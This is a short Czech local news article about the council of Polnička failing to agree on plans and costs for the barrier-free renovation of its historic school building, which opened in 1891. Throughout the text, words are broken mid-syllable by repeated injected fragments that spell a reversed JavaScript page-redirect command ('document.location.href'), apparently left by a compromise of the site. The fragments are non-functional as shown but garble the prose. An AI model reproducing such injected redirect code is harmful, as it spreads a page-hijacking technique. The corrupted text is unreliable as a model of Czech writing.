Rainbow page separator

V Polničce se opět pokusí dohodnout, za kolik opraví školu

Úterý, 27. března 2018

Polnička / Jak dál postupovat při plánované rekonstrukci his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torické školní budovy, aktuálně zvažují zastupitelé Polničky. Vyřešit se musí především bezbariérovost objektu, která je však zároveň finančně nejnáročnější.
„Kde ale mohou exis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat dvě varianty řešení v rozdílném finančním nákladu. Ke shodě v zadání vypracování stavební dokumentace nedošlo a k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tématu bylo svoláno mimořádné jednání zastupitelstva, kdy ani po hodinové diskusi opět nedošlo ke shodě názorů,“ sdělil mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Polničky Luboš Zeman s tím, že zastupitelé uložili některým členům získat pro dubnové jednání podrobné technické informace. Konzul[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny budou jednotlivá řešení s projektanty, shromáždí se reference ze školských zařízení v okolí, kde už obdobné rekonstrukce s podmínkou bezbariérovosti probíhaly.
Školní budova, kterou čeká poslední fáze postupných oprav, původně bývala sídlem železáren. Po přestavbě na školu došlo k jejímu zprovoznění v roce 1891. Budovu obci darovala hraběnka Gallasová, která rovněž její přestavbu pro školní potřeby finančně podpořila.